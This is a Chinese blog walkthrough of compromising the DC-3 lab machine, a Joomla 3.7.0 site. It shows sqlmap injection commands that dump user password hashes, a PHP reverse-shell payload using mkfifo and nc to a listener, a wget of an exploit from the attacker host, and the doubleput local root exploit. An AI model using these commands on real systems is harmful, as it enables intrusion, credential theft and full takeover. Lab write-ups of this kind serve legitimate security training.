靶机dc-3

本文描述了对一个运行JoomlaCMS的IP地址172.20.10.7进行扫描和漏洞利用的过程。通过nmap发现靶机,接着使用JoomScan工具检测版本,然后利用sqlmap工具进行SQL注入,获取数据库信息。通过搜索并应用针对Joomla3.7.0的exploit,最终成功反弹shell并进行权限提升,从而访问了后台并实现了系统的控制。
摘要由CSDN通过智能技术生成

信息收集

本机ip:172.20.10.4
扫描网段:172.20.10.0/24

nmap 172.20.10.0/24

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-09dHiL8O-1685875561721)(https://cdn.nlark.com/yuque/0/2023/png/25923248/1679405672522-300a75a2-208c-43de-b9ec-3b1ce2c63791.png#averageHue=%232a2d38&clientId=ub786735f-b12a-4&from=paste&height=157&id=ue9b10070&originHeight=314&originWidth=980&originalType=binary&ratio=2&rotation=0&showTitle=false&size=181171&status=done&style=none&taskId=uf58982f0-1452-4f5f-b41c-3951c7ced82&title=&width=490)]
扫描出靶机ip
172.20.10.7

nmap -sS -A -sV 172.20.10.7

image.png

浏览器访问看看
image.png
发现 joonmla

joomla

Joomla!是一套全球知名的内容管理系统,Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统

这里需要用到一款工具,叫 joomscan

joomscan

(JoomScan):是一个开源项目,旨在自动执行Joomla CMS部署中的漏洞检测和可靠性保证任务。该工具在Perl中实现,可以无缝轻松地扫描Joomla安装,同时通过其轻量级和模块化架构留下最小的占地面积。它不仅可以检测已知的攻击性漏洞,还能够检测到许多错误配置和管理员级别的缺陷,这些缺陷可被攻击者利用来破坏系统

由于kali上没有,需要自行安装

git clone https://github.com/rezasp/joomscan.git  ##下载源码

cd joomscan  ##进入路径

perl joomscan.pl ##运行

image.png

查看使用的方法

perl joomscan.pl --help

使用最基本的参数

perl joomscan.pl -u 172.20.10.7

image.png
可以看到他的版本和后台
版本:3.7.0
后台:/administrator

搜索漏洞

使用searchsploit工具来搜索相对应的版本的漏洞

searchsploit joomla 3.7.0

image.png
下载第一个

searchsploit -m 42033.txt

cat 42033.txt

image.png
image.png
发现时sql注入漏洞
image.png
告诉来使用用法
直接使用sqlmap工具

sqlmap -u "http://172.20.10.7/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

image.png
爆出5个数据库
继续爆joomladb

sqlmap -u "http://172.20.10.7/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db --batch -p list[fullordering]

image.png
爆joomladb表的列

sqlmap -u "http://172.20.10.7/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batch -p list[fullordering]

image.png
爆users表

sqlmap -u "http://172.20.10.7/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns  -p list[fullordering]

image.png
获取id,name,password的内容

sqlmap -u "http://172.20.10.7/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C id,name,password --batch  -p list[fullordering]

image.png
获得admin的密码
使用工具john进行解密
将密码放到一个文件里
image.png
解出admin的密码为 snoopy

访问172.20.10.7/administrator
image.png
成功进入后台

反弹shell

发现模块可以执行php的脚本

image.png
image.png

image.png
随便选择一个模块,
新建文件,
image.png
新建shell.php
image.png
然后写入php反弹代码,

<?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.20.10.8 4444 >/tmp/f");
?>

kali开启nc监听

nc -lvnp 4444

然后点击save,根据路径访问

http://172.20.10.7/templates/beez3/shell.php

获得交互式shell

输入python命令

python -c 'import pty;pty.spawn("/bin/bash")'

image.png

查找漏洞

earchsploit Ubuntu 16.04

image.png
经过测试,可以用39772,txt可以使用
下载

searchsploit -m 39772.txt

打开发现,给了一个exp的地址
image.png
我们下载下来
在本地下载下来,然后拉到kali中去
然后解压
image.png
image.png
里面有两个文件,我们先讲文件上传到目标服务器
进入目标服务器的/tmp目录下,

wget http://172.20.10.8/exploit.tar

image.png
解压文件

tar -xvf exploit

image.png

执行文件

./compile.sh

image.png

./doubleput

等待一会
image.png
提权成功
拿到flag
image.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值